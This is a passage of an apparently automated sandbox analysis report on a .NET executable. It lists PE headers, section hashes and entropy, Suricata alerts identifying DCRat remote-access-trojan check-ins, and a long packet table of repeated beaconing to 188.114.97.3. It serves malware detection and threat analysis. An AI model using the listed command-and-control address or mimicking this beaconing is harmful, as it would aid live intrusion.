                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x4e5840x4e600a17f76349c96eb580453f43c3797a928False0.42962208433014354data5.777886555534046IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x520000x2180x4007d9273007d21dbe67cf2266be7e636fdFalse0.2626953125data1.8344366501290008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x540000xc0x200af9f2903ff6224c06575ff9f48e919efFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x520580x1c0ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.5223214285714286

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-31T10:15:43.077373+0200TCP2850862ETPRO MALWARE DCRat Initial Checkin Server Response M418049778188.114.97.3192.168.2.4
                              2024-08-31T10:14:16.499938+0200TCP2850862ETPRO MALWARE DCRat Initial Checkin Server Response M418049763188.114.97.3192.168.2.4
                              2024-08-31T10:11:57.441180+0200TCP2034194ET MALWARE DCRAT Activity (GET)14973080192.168.2.4188.114.97.3

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 31, 2024 10:11:56.738287926 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:56.743041039 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:56.743319035 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:56.743779898 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:56.748508930 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:57.440989971 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:57.441009045 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:57.441026926 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:57.441179991 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:58.639460087 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:58.641165972 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:58.644355059 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:58.644516945 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:58.646035910 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:58.646100044 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:58.646229982 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:58.653234005 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:58.911325932 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:58.977535963 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.308053970 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.313023090 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.313194990 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.318181992 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.318219900 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.318314075 CEST8049730188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.318397045 CEST4973080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.584100008 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.633524895 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.763027906 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.763746023 CEST4973280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.768121958 CEST8049731188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.768182993 CEST4973180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.768532991 CEST8049732188.114.97.3192.168.2.4
                              Aug 31, 2024 10:11:59.768600941 CEST4973280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.768696070 CEST4973280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:11:59.773734093 CEST8049732188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.448710918 CEST8049732188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.449615002 CEST4973280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.456938982 CEST8049732188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.457367897 CEST4973280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.458066940 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.462917089 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.463165045 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.463371038 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.469420910 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.821901083 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.826874971 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.826885939 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.826903105 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.826910973 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.826922894 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.826970100 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.827017069 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.827024937 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.827049017 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.827064991 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.827084064 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.827182055 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.827210903 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.831357956 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.831993103 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832005978 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832062960 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.832078934 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832099915 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832142115 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832202911 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.832242966 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.833009005 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.835319042 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.836337090 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.836407900 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.836895943 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.836935043 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:00.836967945 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.837007046 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.837100983 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.837107897 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.837919950 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841264009 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841295004 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841384888 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841396093 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841407061 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841464043 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841470957 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841495037 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841609001 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841615915 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841713905 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841721058 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841829062 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841839075 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841846943 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841861963 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841881990 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.841892004 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.928589106 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:00.977263927 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:01.556022882 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:01.602256060 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.915221930 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.916260004 CEST4973480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.920372963 CEST8049733188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:03.920428991 CEST4973380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.921008110 CEST8049734188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:03.921103001 CEST4973480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.921220064 CEST4973480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:03.925986052 CEST8049734188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:03.926134109 CEST8049734188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:04.650789976 CEST8049734188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:04.696026087 CEST4973480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:09.665786028 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:09.670813084 CEST8049735188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:09.670886040 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:09.671117067 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:09.675918102 CEST8049735188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:09.676033020 CEST8049735188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:10.393224955 CEST8049735188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:10.446022987 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.399657965 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.400748968 CEST4974280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.404781103 CEST8049735188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:15.404834032 CEST4973580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.405477047 CEST8049742188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:15.405544996 CEST4974280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.405662060 CEST4974280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:15.410604000 CEST8049742188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:15.410617113 CEST8049742188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:16.159619093 CEST8049742188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:16.159890890 CEST4974280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:16.165041924 CEST8049742188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:16.165097952 CEST4974280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:21.166172028 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:21.170972109 CEST8049743188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:21.171150923 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:21.171314955 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:21.176076889 CEST8049743188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:21.176212072 CEST8049743188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:21.914422989 CEST8049743188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:21.961673975 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.931109905 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.931972980 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.936542988 CEST8049743188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:26.936604023 CEST4974380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.936801910 CEST8049744188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:26.936877012 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.937011003 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:26.941827059 CEST8049744188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:26.941979885 CEST8049744188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:27.670838118 CEST8049744188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:27.711769104 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:32.681516886 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:32.686534882 CEST8049745188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:32.686619997 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:32.686731100 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:32.691584110 CEST8049745188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:32.692190886 CEST8049745188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:33.417253971 CEST8049745188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:33.461765051 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.446630955 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.447611094 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.451800108 CEST8049745188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:38.451878071 CEST4974580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.452377081 CEST8049746188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:38.452455044 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.452549934 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:38.457298994 CEST8049746188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:38.457432985 CEST8049746188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:39.199090004 CEST8049746188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:39.242933035 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.212173939 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.213293076 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.385700941 CEST8049747188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:44.385802031 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.385869026 CEST8049746188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:44.385922909 CEST4974680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.386066914 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:44.390892029 CEST8049747188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:44.391017914 CEST8049747188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:45.114552975 CEST8049747188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:45.164805889 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:50.119204044 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:50.124034882 CEST8049749188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:50.124108076 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:50.124222994 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:50.129081964 CEST8049749188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:50.129103899 CEST8049749188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:50.861068010 CEST8049749188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:50.914904118 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.868413925 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.869061947 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.873677015 CEST8049749188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:55.873753071 CEST4974980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.873994112 CEST8049750188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:55.874059916 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.874167919 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:12:55.878947973 CEST8049750188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:55.879156113 CEST8049750188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:56.610280037 CEST8049750188.114.97.3192.168.2.4
                              Aug 31, 2024 10:12:56.664828062 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.618957043 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.624944925 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.625144958 CEST8049750188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:01.625201941 CEST4975080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.631706953 CEST8049751188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:01.631875992 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.632052898 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:01.637017012 CEST8049751188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:01.637669086 CEST8049751188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:02.354907036 CEST8049751188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:02.399239063 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.368300915 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.368973017 CEST4975280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.373450994 CEST8049751188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:07.373509884 CEST4975180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.373807907 CEST8049752188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:07.373871088 CEST4975280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.373977900 CEST4975280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:07.378818989 CEST8049752188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:07.379055977 CEST8049752188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:08.109608889 CEST8049752188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:08.110223055 CEST4975280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:08.115236044 CEST8049752188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:08.115328074 CEST4975280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:13.119349003 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:13.124293089 CEST8049753188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:13.124399900 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:13.124547958 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:13.129365921 CEST8049753188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:13.129452944 CEST8049753188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:13.870984077 CEST8049753188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:13.914822102 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.890923023 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.892184019 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.896109104 CEST8049753188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:18.896168947 CEST4975380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.896967888 CEST8049754188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:18.897026062 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.897149086 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:18.901932955 CEST8049754188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:18.902082920 CEST8049754188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:19.623548031 CEST8049754188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:19.665343046 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.659235001 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.659868002 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.664583921 CEST8049754188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:24.664633036 CEST4975480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.664808989 CEST8049755188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:24.664866924 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.665007114 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:24.670063972 CEST8049755188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:24.670130968 CEST8049755188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:25.407684088 CEST8049755188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:25.461704016 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.415405035 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.416631937 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.421317101 CEST8049755188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:30.421369076 CEST4975580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.421628952 CEST8049756188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:30.421690941 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.421821117 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:30.426640987 CEST8049756188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:30.426831007 CEST8049756188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:31.156621933 CEST8049756188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:31.216142893 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.165350914 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.166217089 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.170584917 CEST8049756188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:36.170634031 CEST4975680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.171029091 CEST8049757188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:36.171087027 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.171247959 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:36.176016092 CEST8049757188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:36.176178932 CEST8049757188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:36.906351089 CEST8049757188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:36.961710930 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:41.916244030 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:41.921489000 CEST8049758188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:41.921626091 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:41.921751976 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:41.926733971 CEST8049758188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:41.926745892 CEST8049758188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:42.664119959 CEST8049758188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:42.758596897 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.665194035 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.665904045 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.670264006 CEST8049758188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:47.670723915 CEST8049759188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:47.673433065 CEST4975880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.673434973 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.673547029 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:47.678298950 CEST8049759188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:47.678492069 CEST8049759188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:48.417118073 CEST8049759188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:48.461726904 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.431512117 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.435935020 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.436803102 CEST8049759188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:53.440921068 CEST8049760188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:53.440954924 CEST4975980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.443692923 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.443692923 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:53.448539019 CEST8049760188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:53.448682070 CEST8049760188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:54.173933029 CEST8049760188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:54.242984056 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.180938959 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.181777954 CEST4976180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.186150074 CEST8049760188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.186664104 CEST8049761188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.189428091 CEST4976080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.189523935 CEST4976180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.189524889 CEST4976180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.194504023 CEST8049761188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.194514990 CEST8049761188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.916388988 CEST8049761188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.917589903 CEST4976180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:13:59.922833920 CEST8049761188.114.97.3192.168.2.4
                              Aug 31, 2024 10:13:59.925431013 CEST4976180192.168.2.4188.114.97.3
